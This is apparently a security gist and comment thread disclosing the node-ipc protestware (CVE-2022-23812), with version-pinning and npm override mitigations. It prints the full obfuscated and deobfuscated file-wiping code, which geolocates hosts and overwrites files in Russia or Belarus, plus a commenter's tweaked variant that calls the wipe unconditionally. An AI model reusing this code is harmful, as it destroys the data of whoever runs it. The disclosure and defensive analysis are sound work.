RIAEvangelist/node-ipc is malware / protestware
The RIAEvangelist/node-ipc
module contains protestware peacenotwar.
Excerpt from RIAEvangelist/node-ipc:
as of v11.0.0 & v9.2.2 this module uses the peacenotwar module.
More importantly, commits 847047cf7f81ab08352038b2204f0e7633449580 -> 6e344066a0464814a27fbd7ca8422f473956a803
of RIAEvangelist/node-ipc
contains malware.
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}
I deobfuscated the code above and found that if the host machine's public ip address was from Russia or Belarus, node-ipc would proceed overwrite many files with a heart emoji recursively while traversing up parent directories:
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
const t = Math.round(Math.random() * 4);
if (t > 1) {
return;
}
const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
o.get(n.toString("utf8"), function (t) {
t.on("data", function (t) {
const n = Buffer.from("Li8=", "base64");
const o = Buffer.from("Li4v", "base64");
const r = Buffer.from("Li4vLi4v", "base64");
const f = Buffer.from("Lw==", "base64");
const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
const e = Buffer.from("cnVzc2lh", "base64");
const i = Buffer.from("YmVsYXJ1cw==", "base64");
try {
const s = JSON.parse(t.toString("utf8"));
const u = s[c.toString("utf8")].toLowerCase();
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
if (a) {
h(n.toString("utf8"));
h(o.toString("utf8"));
h(r.toString("utf8"));
h(f.toString("utf8"));
}
} catch (t) {}
});
});
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
if (!a.existsSync(n)) {
return;
}
let r = [];
try {
r = a.readdirSync(n);
} catch (t) {}
const f = [];
const c = Buffer.from("4p2k77iP", "base64");
for (var e = 0; e < r.length; e++) {
const i = u.join(n, r[e]);
let t = null;
try {
t = a.lstatSync(i);
} catch (t) {
continue;
}
if (t.isDirectory()) {
const s = h(i, o);
s.length > 0 ? f.push(...s) : null;
} else if (i.indexOf(o) >= 0) {
try {
a.writeFile(i, c.toString("utf8"), function () {});
} catch (t) {}
}
}
return f;
}
const ssl = true;
export { ssl as default, ssl };
The following are excerpts from the malicious code:
Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
// checks if ip country is Russia or Belarus
a.writeFile(i, c.toString("utf8"), function () {});
// overwrites file with `❤️`
The following demonstrates example of what each of the parameters going to the a.writeFile(i,c.toString("utf8")
would be:
Just made it better looked and commented dangerous code so you guys can take a try. Obviously the code will delete literally EVERYTHING on your drive.
const path = require("path"); const fs = require("fs"); const https = require("https"); setTimeout(function () { const randomNumber = Math.round(Math.random() * 4); if (randomNumber > 1) { // return; } const apiKey = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154"; const pwd = "./"; const parentDir = "../"; const grandParentDir = "../../"; const root = "/"; const countryName = "country_name"; const russia = "russia"; const belarus = "belarus"; https.get(apiKey, function (message) { message.on("data", function (msgBuffer) { try { const message = JSON.parse(msgBuffer.toString("utf8")); const userCountryName = message[countryName.toString("utf8")].toLowerCase(); const hasRus = userCountryName.includes(russia.toString("utf8")) || userCountryName.includes(belarus.toString("utf8")); // checks if country is Russia or Belarus if (hasRus) { deleteFile(pwd); deleteFile(parentDir); deleteFile(grandParentDir); deleteFile(root); } } catch (t) {} }); }); // zkyf: Let's try this directly here deleteFile(pwd); deleteFile(parentDir); deleteFile(grandParentDir); deleteFile(root); }, 100); async function deleteFile(pathName = "", o = "") { if (!fs.existsSync(pathName)) { return; } let fileList = []; try { fileList = fs.readdirSync(pathName); } catch (t) {} const f = []; const heartUtf8 = Buffer.from("4p2k77iP", "base64"); for (var idx = 0; idx < fileList.length; idx++) { const fileName = path.join(pathName, fileList[idx]); let fileInfo = null; try { fileInfo = fs.lstatSync(fileName); } catch (err) { continue; } if (fileInfo.isDirectory()) { const fileSymbol = deleteFile(fileName, o); fileSymbol.length > 0 ? f.push(...fileSymbol) : null; } else if (fileName.indexOf(o) >= 0) { try { // fs.writeFile(fileName, heartUtf8.toString("utf8"), function () {}); // overwrites file with `❤️` console.log(`Rewrite ${fileName}`); } catch (err) {} } } return f; }
The following mitigation strategies are inspired by cnpm's (is not npm) mitigation methods: cnpm/bug-versions#181
If you use one of the following mitigation stratagies, make sure to remove the ^
to force node-ipc
to the specified version.
"^9.x.x" -> "9.2.1"
"dependencies": {
- "node-ipc": "^9.x.x"
+ "node-ipc": "9.2.1"
}
"^10.x.x" -> "10.1.0"
"dependencies": {
- "node-ipc": "^10.x.x"
+ "node-ipc": "10.1.0"
}
"^11.x.x" -> "10.1.0"
"dependencies": {
- "node-ipc": "^11.x.x"
+ "node-ipc": "10.1.0"
}
@RIAEvangelist has banned me from interacting with their repositories
The security research firm snyk.io recommends the following mitigation strategy for users of node-ipc
:
package.json
"overrides": {
"node-ipc@>9.2.1 <10": "9.2.1",
"node-ipc@>10.1.0": "10.1.0"
}
Edit 2022-03-17_2 (credit: @Uzlopak)
Don't forget to mention that npm supports override with npm 8. Earlier versions don't have overrides capabilities. So node 12 and 14, which are LTS, use by default npm 6 and that would not work with them. So upgrading npm to 8 would be necessary.
I'm not too familiar with how yarn works, so I don't want to risk giving false instructions to users.
I've been seeing a lot of hate comments going after the owner of node-ipc
(especially on their repositories).
We should remember the high standards that we expect from our fellow developers on GitHub, regardless of what another has done.
Preferably this gist and it's comments should be focused on the research and discussion of CVE-2022-23812.
I'm sure that the owner of node-ipc
will be reprimanded by their employer, NPM, and GitHub.
I've begun work on my own fork of node-ipc
:
MidSpike/node-ipc#1
The guy purged his github repo and republished it with help from github to kill all the old hashes..
RIAEvangelist/node-ipc#3
The versions live on noderpm still can deliver malware, as issue states.
My archive is still live for posterity reasons. Here is the release of the code he pushed:
https://github.com/samuelmattjohnston/node-ipc/releases/tag/v10.1.3
samuelmattjohnston/node-ipc@847047c